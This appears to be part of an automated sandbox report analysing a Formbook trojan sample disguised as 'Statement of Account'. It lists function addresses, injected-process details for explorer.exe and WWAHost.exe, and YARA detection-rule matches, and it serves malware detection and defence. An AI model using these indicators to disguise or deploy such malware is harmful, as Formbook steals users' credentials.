          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015481CC4_2_015481CC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015441A24_2_015441A2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015501AA4_2_015501AA
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015220004_2_01522000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154A3524_2_0154A352
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015503E64_2_015503E6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F04_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015302744_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015102C04_2_015102C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014905354_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015505914_2_01550591
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015424464_2_01542446
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015344204_2_01534420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153E4F64_2_0153E4F6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B47504_2_014B4750
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014907704_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148C7C04_2_0148C7C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AC6E04_2_014AC6E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A69624_2_014A6962
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A04_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155A9A64_2_0155A9A6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149A8404_2_0149A840
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014928404_2_01492840
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE8F04_2_014BE8F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014768B84_2_014768B8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154AB404_2_0154AB40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01546BD74_2_01546BD7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148EA804_2_0148EA80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149AD004_2_0149AD00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152CD1F4_2_0152CD1F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148ADE04_2_0148ADE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A8DBF4_2_014A8DBF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490C004_2_01490C00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480CF24_2_01480CF2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530CB54_2_01530CB5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01504F404_2_01504F40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01532F304_2_01532F30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D2F284_2_014D2F28
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B0F304_2_014B0F30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482FC84_2_01482FC8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149CFE04_2_0149CFE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150EFA04_2_0150EFA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490E594_2_01490E59
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154EE264_2_0154EE26
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154EEDB4_2_0154EEDB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154CE934_2_0154CE93
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2E904_2_014A2E90
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C516C4_2_014C516C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147F1724_2_0147F172
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155B16B4_2_0155B16B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149B1B04_2_0149B1B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014970C04_2_014970C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153F0CC4_2_0153F0CC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154F0E04_2_0154F0E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015470E94_2_015470E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147D34C4_2_0147D34C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154132D4_2_0154132D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D739A4_2_014D739A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AB2C04_2_014AB2C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015312ED4_2_015312ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014952A04_2_014952A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015475714_2_01547571
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015595C34_2_015595C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152D5B04_2_0152D5B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014814604_2_01481460
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154F43F4_2_0154F43F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154F7B04_2_0154F7B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D56304_2_014D5630
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015416CC4_2_015416CC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014999504_2_01499950
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AB9504_2_014AB950
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015259104_2_01525910
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FD8004_2_014FD800
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014938E04_2_014938E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FB764_2_0154FB76
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01505BF04_2_01505BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014CDBF94_2_014CDBF9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AFB804_2_014AFB80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01547A464_2_01547A46
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FA494_2_0154FA49
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01503A6C4_2_01503A6C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153DAC64_2_0153DAC6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D5AA04_2_014D5AA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01531AA34_2_01531AA3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152DAAC4_2_0152DAAC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01493D404_2_01493D40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01541D5A4_2_01541D5A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01547D734_2_01547D73
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AFDC04_2_014AFDC0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01509C324_2_01509C32
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FCF24_2_0154FCF2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FF094_2_0154FF09
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01453FD54_2_01453FD5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01453FD24_2_01453FD2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01491F924_2_01491F92
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FFB14_2_0154FFB1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01499EB04_2_01499EB0
          Source: C:\Windows\explorer.exeCode function: 7_2_092582327_2_09258232
          Source: C:\Windows\explorer.exeCode function: 7_2_09252B307_2_09252B30
          Source: C:\Windows\explorer.exeCode function: 7_2_09252B327_2_09252B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0924FD027_2_0924FD02
          Source: C:\Windows\explorer.exeCode function: 7_2_092559127_2_09255912
          Source: C:\Windows\explorer.exeCode function: 7_2_0925B5CD7_2_0925B5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_092570367_2_09257036
          Source: C:\Windows\explorer.exeCode function: 7_2_0924E0827_2_0924E082
          Source: C:\Windows\explorer.exeCode function: 7_2_106E00367_2_106E0036
          Source: C:\Windows\explorer.exeCode function: 7_2_106D70827_2_106D7082
          Source: C:\Windows\explorer.exeCode function: 7_2_106D8D027_2_106D8D02
          Source: C:\Windows\explorer.exeCode function: 7_2_106DE9127_2_106DE912
          Source: C:\Windows\explorer.exeCode function: 7_2_106E45CD7_2_106E45CD
          Source: C:\Windows\explorer.exeCode function: 7_2_106E12327_2_106E1232
          Source: C:\Windows\explorer.exeCode function: 7_2_106DBB307_2_106DBB30
          Source: C:\Windows\explorer.exeCode function: 7_2_106DBB327_2_106DBB32
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001600909_2_00160090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00126BA39_2_00126BA3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00126BA89_2_00126BA8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00164CE09_2_00164CE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00170EF09_2_00170EF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001270369_2_00127036
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001713379_2_00171337
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041344209_2_04134420
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041424469_2_04142446
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0413E4F69_2_0413E4F6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040905359_2_04090535
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041505919_2_04150591
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040AC6E09_2_040AC6E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040B47509_2_040B4750
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040907709_2_04090770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408C7C09_2_0408C7C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041220009_2_04122000
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040801009_2_04080100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0412A1189_2_0412A118
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041181589_2_04118158
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041441A29_2_041441A2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041501AA9_2_041501AA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041481CC9_2_041481CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041302749_2_04130274
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041102C09_2_041102C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414A3529_2_0414A352
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041503E69_2_041503E6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409E3F09_2_0409E3F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04090C009_2_04090C00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04130CB59_2_04130CB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04080CF29_2_04080CF2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409AD009_2_0409AD00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0412CD1F9_2_0412CD1F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A8DBF9_2_040A8DBF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408ADE09_2_0408ADE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414EE269_2_0414EE26
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04090E599_2_04090E59
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414CE939_2_0414CE93
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A2E909_2_040A2E90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414EEDB9_2_0414EEDB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04132F309_2_04132F30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040D2F289_2_040D2F28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040B0F309_2_040B0F30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04104F409_2_04104F40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0410EFA09_2_0410EFA0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04082FC89_2_04082FC8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409CFE09_2_0409CFE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409A8409_2_0409A840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040928409_2_04092840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040768B89_2_040768B8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040BE8F09_2_040BE8F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A69629_2_040A6962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040929A09_2_040929A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0415A9A69_2_0415A9A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408EA809_2_0408EA80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414AB409_2_0414AB40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: String function: 014D7E54 appears 111 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: String function: 0150F290 appears 105 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: String function: 014C5130 appears 58 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: String function: 014FEA12 appears 86 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: String function: 0147B970 appears 280 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 040FEA12 appears 49 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0017318B appears 128 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0410F290 appears 80 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 00192F80 appears 922 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 040D7E54 appears 50 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 00194C81 appears 35 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0016E951 appears 387 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0407B970 appears 75 times
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 00194FF1 appears 138 times
          Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000000.2038477421.0000000000CC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2494382664.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2509254740.00000000074B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003150000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exeBinary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
